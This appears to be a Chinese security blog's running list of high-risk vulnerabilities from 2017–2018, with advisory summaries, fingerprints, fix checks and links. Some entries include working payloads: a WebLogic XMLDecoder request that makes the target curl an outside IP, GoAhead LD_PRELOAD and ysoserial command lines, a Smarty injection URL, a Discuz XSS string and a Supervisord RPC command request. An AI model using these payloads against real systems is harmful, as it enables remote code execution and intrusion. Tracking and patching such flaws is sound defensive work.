高危漏洞情报列表LTS

Reading time ~1 minute

2018

  1. 【20180124】SmartyPHP模板引擎命令执行RCE漏洞
    • 分析文章:https://xianzhi.aliyun.com/forum/topic/1983
    • 组件指纹:smarty_internal_runtime_codeframe.php 存在这个文件说明使用smarty
    • 修复判断:如果文件内容没有str_replace('*/','* /',$_template->source->filepath)说明没有修复
    • 扫描用例:http://smart-y.teaser.insomnihack.ch/console.php?id=*/phpinfo();/*
  2. 【20180118】Libc Realpath缓冲区溢出漏洞(CVE-2018-1000001),Linux提权漏洞
  3. 【20180104】Intel等CPU存在边信道内存泄露漏洞: Meltdoan,Spectre

2017

  1. 【20171222】Weblogic WLS组件 XMLDecoder反序列化漏洞 CVE-2017-10271
	POST /wls-wsat/CoordinatorPortType HTTP/1.1
	Host: 139.199.48.52:7001
	Cache-Control: max-age=0
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)
	Upgrade-Insecure-Requests: 1
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
	DNT: 1
	Accept-Encoding: identity
	Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6,la;q=0.5,da;q=0.4
	Cookie: 
	Connection: close
	Content-Length: 617

	<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
	<soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	<java version="1.7.0_71" class="java.beans.XMLDecoder">
	 <void class="java.lang.ProcessBuilder">
	      <array class="java.lang.String" length="2">
	          <void index="0">
	              <string>curl</string>
	          </void>
		  <void index="1">
			<string>123.207.227.150:8080</string>
		  </void>
	      </array>
	      <void method="start" />
	 </void>
	</java>
	</work:WorkContext>
	</soapenv:Header>
	<soapenv:Body/>
	</soapenv:Envelope>
  1. 【20171219】GoAhead服务器CGI存在LD_PRELOAD命令执行漏洞 CVE-2017-17562
    • 影响范围:3.6.5以下版本的GoAhead,开启CGI脚本支持
    • 漏洞描述:在初始化CGI脚本环境时,未限制用户参数中的环境变量名。该漏洞将影响所有开启了CGI脚本支持(动态链接可执行脚本文件)的GoAhead服务。通过传入恶意的LD_PRELOAD变量可以Hook服务器端的共享函数库,执行恶意动态链接对象。而且launchCgi方法会使用dup2()来处理stdin文件描述符,而它指向的是一个包含了POST请求body内容的临时文件。而Linux procfs文件系统的符号链接可以帮助我们直接引用stdin描述符,而它指向的就是我们所要找的临时文件。这样我们可以在Post Body中传入恶意Payload和相关构造器,来远程利用这个漏洞。
    • PoC:curl -X POST –data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i
    • 漏洞分析:http://mp.weixin.qq.com/s/fDR1tVvMJwXTeOWphUQl1Q
    • 漏洞分析:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4282.html
  2. 【20171211】 Apache Synapse反序列化命令执行漏洞
java -cp ysoserial-0.0.5-ALL.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 CommonsCollections1  "touch /tmp/apache_synapse"
  1. 【20171130】大脏牛漏洞 - Linux提权
  2. 【20171127】Office Word命令执行漏洞
    • 2017年11月14日,微软发布了11月的安全补丁更新,其中CVE-2017-11882是一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。
    • 漏洞分析:http://bobao.360.cn/learning/detail/4753.html
    • 利用程序:https://github.com/embedi/CVE-2017-11882
  3. 【20171116】CouchDB远程代码执行漏洞 - 参数污染加管理员
  4. 【20171020】Discuz竞价排行XSS漏洞

    • /misc.php?mod=ranklist&type=member 添加上榜宣言 <img src=1 onerror=alert(1)>
    • /misc.php?mod=ranklist&type=index 鼠标移动到当前用户头像处,触发XSS漏洞
    • 补丁:https://gitee.com/ComsenzDiscuz/DiscuzX/
  5. 【20171019】Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution

  6. 【20170929】Discuz!X任意文件删除漏洞

  7. 【20170928】Spring Data Rest远程代码执行漏洞

  8. 【20170920】Tomcat绕过安全限制PUT上传JSP文件,导致远程代码执行

  9. 【20170920】Wordpress SQLi、XSS等高危漏洞修复

  10. 【20170919】Apache Optionsbleed漏洞

  11. 【20170908】 S2-053 Struts2 Freemarker标签远程代码执行

    • https://cwiki.apache.org/confluence/display/WW/S2-053
  12. 【20170907】S2-052 Struts2 Rest插件反序列化命令执行漏洞

    • https://cwiki.apache.org/confluence/display/WW/S2-052
    • 分析:提交XML格式的恶意请求进行利用。
    • 安全版本:2.3.34、2.5.13
  13. 【20170401】Supervisord RPC服务端RCE漏洞(需认证)
	POST /RPC2 HTTP/1.1
	Host: localhost
	Accept: */*
	Accept-Language: en
	User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
	Connection: close
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 275

	<?xml version="1.0"?>
	<methodCall>
	<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
	<params>
	<param>
	<string>touch /tmp/success</string>
	</param>
	</params>
	</methodCall>

Python热加载问题

Published on January 10, 2018

敏捷开发 - VueJS摸鱼手记

Published on January 09, 2018